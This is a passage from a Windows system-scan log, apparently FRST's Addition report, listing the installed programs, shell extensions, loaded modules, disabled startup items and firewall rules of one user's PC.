Wondershare Filmora(Build 8.5.3) (HKLM\...\Wondershare Filmora_is1) (Version:  - Wondershare Software)
Wondershare Helper Compact 2.5.2 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.5.2 - Wondershare)
XviD MPEG4 Video Codec (remove only) (HKLM-x32\...\XviD MPEG4 Video Codec) (Version:  - )
ZD Soft Screen Recorder 11.2.0 (HKLM-x32\...\{05289906-8CDE-44FD-9FA5-95866BF511A9}) (Version: 11.2.0.0 - ZD Soft)
 
==================== Custom CLSID (Whitelisted): ==============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\FileSyncApi64.dll (Microsoft Corporation -> Microsoft Corporation)
ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [DivXShellExtensionItem] -> {48A8A3B0-57E8-4F2B-A49D-19E02B92377B} => C:\Program Files (x86)\Common Files\DivX Shared\DivXShellExtension64.dll [2018-10-09] (DivX, LLC -> DivX, LLC)
ContextMenuHandlers1: [DivXShellExtensionItem64] -> {6B49A276-0DBA-43F4-BC96-A841AD11B40B} => C:\Program Files (x86)\Common Files\DivX Shared\DivXShellExtension64.dll [2018-10-09] (DivX, LLC -> DivX, LLC)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => c:\program files (x86)\real\realplayer\RPDS\Bin64\rpcloudview.dll [2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2012-03-19] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
 
==================== Codecs (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Drivers32: [VIDC.ACDV] => ACDV.dll
HKLM\...\Drivers32-x32: [VIDC.ACDV] => ACDV.dll
HKLM\...\Drivers32: [vidc.DIVX] => C:\Windows\SysWOW64\DivX.dll [720384 2010-02-19] (DivX, Inc.) [File not signed]
HKLM\...\Drivers32: [vidc.yv12] => C:\Windows\SysWOW64\DivX.dll [720384 2010-02-19] (DivX, Inc.) [File not signed]
HKLM\...\Drivers32-x32: [VIDC.LAGS] => lagarith.dll
HKLM\...\Drivers32: [vidc.XVID] => C:\Windows\SysWOW64\xvidvfw.dll [179200 2009-01-25] () [File not signed]
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\Users\Vladana\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Profile 1"
 
==================== Loaded Modules (Whitelisted) =============
 
2013-05-18 17:25 - 2013-05-18 17:25 - 001350656 _____ ( ) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNGadgetClass\10d2c6adb5906a1d7bbeb75d2a713c07\PFNGadgetClass.ni.dll
2017-09-02 13:47 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2017-09-02 13:47 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2018-06-05 02:08 - 2014-05-19 16:19 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSCreateVC.dll
2018-06-05 02:08 - 2014-10-31 15:40 - 001498112 _____ () [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\DAQExp.dll
2017-09-02 13:47 - 2017-08-15 09:10 - 000113664 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\Tasks.dll
2017-09-02 13:47 - 2017-08-15 09:10 - 000139776 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\Utility.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 000758784 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Core.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 001778688 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Ctrls.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 000046080 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Localization.dll
2011-12-16 15:37 - 2011-12-16 15:37 - 002437632 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNCommon.dll
2011-12-16 15:38 - 2011-12-16 15:38 - 002246144 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNDevice.dll
2011-12-22 09:03 - 2011-12-22 09:03 - 002281984 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNWLAN.dll
2013-05-18 17:25 - 2013-05-18 17:25 - 000421888 _____ (FUJITSU LIMITED) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNLocSet\b7cc59ff84258f2c78492c7ef6c33d6e\PFNLocSet.ni.dll
2013-05-18 17:25 - 2013-05-18 17:25 - 000473088 _____ (FUJITSU LIMITED) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNSwData\9a909070ecd70366e5c577eb52b4bbda\PFNSwData.ni.dll
2012-03-08 12:17 - 2012-03-08 12:17 - 000333312 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\BluetoothHS\BTHSSupplicant.dll
2012-03-01 10:52 - 2012-03-01 10:52 - 000105472 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\BluetoothHS\UsR3IoPort.dll
2012-03-29 06:37 - 2012-03-29 06:37 - 000498176 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\P2PSupplicant.dll
2012-04-17 18:35 - 2012-04-17 18:35 - 000168448 _____ (Intel® Corporation) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\PsRegApi.dll
2012-04-17 18:37 - 2012-04-17 18:37 - 000284160 _____ (Intel® Corporation) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\TraceApi.dll
2012-04-17 18:36 - 2012-04-17 18:36 - 003280896 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\AmtWsMan.dll
2012-04-17 18:34 - 2012-04-17 18:34 - 000102400 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\DbEngine.dll
2012-04-17 18:38 - 2012-04-17 18:38 - 000104448 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\IntStngs.dll
2012-04-17 18:37 - 2012-04-17 18:37 - 000054272 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL
2012-04-17 18:46 - 2012-04-17 18:46 - 000545792 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\MurocApi.dll
2012-04-17 18:50 - 2012-04-17 18:50 - 000324608 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\panihvint.dll
2012-04-17 18:43 - 2012-04-17 18:43 - 001051136 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\PfMgrApi.dll
2012-04-17 18:51 - 2012-04-17 18:51 - 000178176 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\Ps7ZCfgS.dll
2012-04-17 18:34 - 2012-04-17 18:34 - 000020992 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\S24MUDLL.dll
2012-04-17 18:45 - 2012-04-17 18:45 - 002463744 _____ (Intel® Corporation) [File not signed] C:\Windows\System32\IWMSSvc.dll
2006-10-26 13:44 - 2006-10-26 13:44 - 000123904 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\csm.dll
2006-10-26 13:45 - 2006-10-26 13:45 - 000247296 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\msdbg2.dll
2012-04-17 17:52 - 2012-04-17 17:52 - 001830912 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2017-09-02 13:47 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll
2018-06-05 02:08 - 2014-10-31 15:41 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSProducstInfo.dll
 
==================== Alternate Data Streams (Whitelisted) ========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:94A19129 [260]
 
==================== Safe Mode (Whitelisted) ==================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) =================
 
==================== Internet Explorer trusted/restricted ==========
 
==================== Hosts content: =========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2019-11-09 17:42 - 2019-11-18 19:26 - 000000822 _____ C:\Windows\system32\drivers\etc\hosts
 
==================== Other Areas ===========================
 
(Currently there is no automatic fix for this section.)
 
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Program Files (x86)\PC Connectivity Solution\;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Intel\OpenCL SDK\2.0\bin\x86;C:\Program Files (x86)\Intel\OpenCL SDK\2.0\bin\x64;C:\Program Files\Intel\Intel® Management Engine Components\DAL;C:\Program Files\Intel\Intel® Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files (x86)\QuickTime\QTSystem\
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 0) (EnableLUA: 0)
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(If an entry is included in the fixlist, it will be removed.)
 
MSCONFIG\Services: BstHdAndroidSvc => 2
MSCONFIG\Services: BstHdLogRotatorSvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: RealPlayer Cloud Service => 2
MSCONFIG\Services: RealPlayerUpdateSvc => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^RealPlayer Cloud Service UI.lnk => C:\Windows\pss\RealPlayer Cloud Service UI.lnk.CommonStartup
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: DivXMediaServer => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
MSCONFIG\startupreg: DivXUpdate => "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
MSCONFIG\startupreg: Google Update => "C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: NSU_agent => "C:\Program Files (x86)\Nokia\Nokia Software Updater\nsu3ui_agent.exe"
MSCONFIG\startupreg: PC Suite Tray => "C:\Program Files (x86)\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RealDownloader => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
MSCONFIG\startupreg: Spotify Web Helper => C:\Users\Vladana\AppData\Roaming\Spotify\SpotifyWebHelper.exe --autostart
MSCONFIG\startupreg: TkBellExe => "c:\program files (x86)\real\realplayer\Update\realsched.exe" -osboot
MSCONFIG\startupreg: Wondershare Helper Compact.exe => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
 
==================== FirewallRules (Whitelisted) ================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{418A7595-F489-448D-A132-2A9519236EF0}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel Corporation-Mobile Wireless Group -> )
FirewallRules: [{B0E6337C-DD13-46CD-A572-58359114E70E}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{5B4B9E35-FBA6-4F36-8798-35D35E29E74B}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{B1CC60A0-4651-4E6D-A4FA-32240C388099}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{A0A9A6FA-AE67-4AB9-B612-32D06F124746}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{CE426DDA-632D-4252-8AF5-B3999BF81124}] => (Allow) C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{CDC85982-754B-4DE3-977B-6E479A26C388}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{F565ACF8-37C4-4665-A110-386DCCDF81E9}] => (Allow) LPort=2869
FirewallRules: [{BA538C52-47F4-4638-88FB-D4E100881E6A}] => (Allow) LPort=1900
FirewallRules: [TCP Query User{838DFD5B-BE28-4A8A-9D48-591EFEF35AB6}C:\program files (x86)\real\realplayer\realplay.exe] => (Allow) C:\program files (x86)\real\realplayer\realplay.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [UDP Query User{7BCDD032-7F97-4FE8-ADB0-130474CDDD9F}C:\program files (x86)\real\realplayer\realplay.exe] => (Allow) C:\program files (x86)\real\realplayer\realplay.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [{DAA4242B-32CB-43E0-B514-40A492583C52}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{87CC937C-627E-4461-A86D-A01FA1D52711}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{787EA532-6389-4D57-8CB4-56ED49F60E38}] => (Allow) C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe No File
FirewallRules: [{F0F6824E-F9E8-401C-92A1-52EE1D31841E}] => (Allow) C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe No File
FirewallRules: [TCP Query User{BE9D298D-4B00-4F7D-AA02-CE4B8C269C09}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe No File
FirewallRules: [UDP Query User{010D4FEB-5458-4625-B346-3F087D27F4A3}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe No File
FirewallRules: [TCP Query User{DF4734DC-C765-4167-986C-24CF01DB1137}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [UDP Query User{E878D949-B0E7-411A-8F5A-335EE806B7C2}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [TCP Query User{C1202602-2671-439A-8CF4-FFA06CC539FB}C:\users\vladana\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\vladana\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [UDP Query User{3F9714B5-446C-4FD2-91A7-085A9AAF37D8}C:\users\vladana\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\vladana\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [TCP Query User{813FD61F-108E-4C8F-8713-5C5C65A07F20}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{94D1C3B8-E5D6-406D-8550-D0FB1A8AFD18}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{EBCB1A48-8CAD-40A0-97C9-A5E7D1969006}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe No File
FirewallRules: [UDP Query User{51B1713E-C3DC-4E9B-8B2E-299D5D7EB37D}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe No File
FirewallRules: [{AD675AD4-8A27-4858-B7BF-64062E576C45}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{FF4764D4-F4A6-4C99-B73E-53F8DE61E6F9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{61F7EE47-9BA9-4D47-ADB6-5E48B1DF1F11}] => (Allow) c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [TCP Query User{9DA426E5-870A-46BA-ACD6-3BECCA6D3981}C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{E35C77F8-2476-4F58-B62F-633DD6DA4D7B}C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{64ADE5CF-E0E0-432A-ADCA-107CEF11A830}C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{29E89790-5F1F-403F-9200-85040488F6BF}C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{051C8ED1-8257-4C07-9843-3A321CB1D2B5}C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{11E9C41A-BB10-4AE0-86A2-D113F4631726}C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{1028E6BB-11FD-426E-9846-980F150B8359}C:\users\vladana\appdata\local\popcorn time\nw.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\nw.exe No File
FirewallRules: [UDP Query User{131B9741-3987-48AB-97A9-8EB722A5AD2D}C:\users\vladana\appdata\local\popcorn time\nw.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\nw.exe No File
FirewallRules: [{10CC44FD-3D7B-40D9-B4E9-C8B90B3CDA05}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{0F44D93E-8116-4C28-A09E-375525612959}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{DE2D1B1A-A95A-4427-8BD7-97016C528F99}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe (Popcorn Time) [File not signed]
FirewallRules: [{023EC48C-AAA6-4832-8DEF-E77068991D61}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe (Popcorn Time) [File not signed]
FirewallRules: [{ED5D1E50-0E04-48A8-A0FF-52EBBC8DC18D}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Andy_46.2_x64\Setup.exe No File
FirewallRules: [{A9B6A8FC-243F-45C5-B45E-B94CA201DFA7}] => (Allow) C:\Program Files\Andy\andy.exe No File
FirewallRules: [{59B2491E-5BF2-4DC5-AE8D-F34BD2AC1230}] => (Allow) C:\Program Files\Andy\andy.exe No File
FirewallRules: [{EF33A6D0-D34B-4630-9AE0-D5B6319C642D}] => (Allow) C:\Program Files\Andy\AndyConsole.exe No File
FirewallRules: [{0C8E4F25-226B-4BC9-BBD0-A6FDD1D99E01}] => (Allow) C:\Program Files\Andy\AndyConsole.exe No File
FirewallRules: [{E5EC7B01-738D-42B0-960C-4051ADBF6E85}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe No File
FirewallRules: [{28B9FA2D-E66B-453A-9DAB-DDB820A60893}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe No File
FirewallRules: [{2F79B4C8-3AFC-4E30-B1B2-EE4203877302}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe No File
FirewallRules: [{FEE98E1E-A352-4C6D-A55F-F641B4E69F55}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe No File
FirewallRules: [{A16DB9E7-288D-4E5B-BD58-5404E7DED756}] => (Allow) C:\Program Files\Andy\HandyAndy.exe No File
FirewallRules: [{986F830C-A0F0-4829-A1D3-6E209C9346FE}] => (Allow) C:\Program Files\Andy\HandyAndy.exe No File
FirewallRules: [{7AB977CD-EA90-4ECA-865F-E3924B0DEBC6}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{9FDF76F3-5DF0-4A94-B6C4-F6F10388EEDD}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{9E97B312-F759-4491-9B4A-9A7F7BD66B49}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{3B74B220-3059-4A75-949E-50972E487A28}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{187F27A2-9AE2-489B-B927-B8FC03CC268B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{A9130200-545F-467A-9A36-1B798C073847}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{7F1F91ED-8AE2-4EF5-8A6E-42BCE82D179B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{5DEA6D27-54CF-4606-949E-BD3C17E5B786}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [TCP Query User{DF58AEE1-F55F-4C53-ADDB-ACE482856AE1}C:\users\vladana\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vladana\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{872BEA53-323F-4801-81BF-7FFB853B9696}C:\users\vladana\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vladana\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{8EB9B601-87D3-4318-8ED9-03D843F1590B}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{597233C9-A6EB-4645-8677-888825AFC9CE}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{4077A009-74D8-44BE-AD00-C76EEF7EE5BD}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe (Apowersoft Ltd -> )
FirewallRules: [{DAE1B584-4569-4BAB-B953-D64ABABDAAD5}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe (Apowersoft Ltd -> )
FirewallRules: [TCP Query User{3B57E49F-50A7-468F-A210-D44AA14F7EE4}C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe] => (Allow) C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe (WONBO TECHNOLOGY Co.,LIMITED -> Wondershare)
FirewallRules: [UDP Query User{13BD579F-4B71-49B9-9983-2D442B1932E8}C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe] => (Allow) C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe (WONBO TECHNOLOGY Co.,LIMITED -> Wondershare)
FirewallRules: [{CF745F74-D653-4FD3-8D0D-19E40F7120AE}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe No File
FirewallRules: [{AB407DB0-7E44-4FFA-A876-AC39F106ECB0}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe No File
FirewallRules: [{6D250D03-52C1-4019-980F-9AC5B16C218B}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
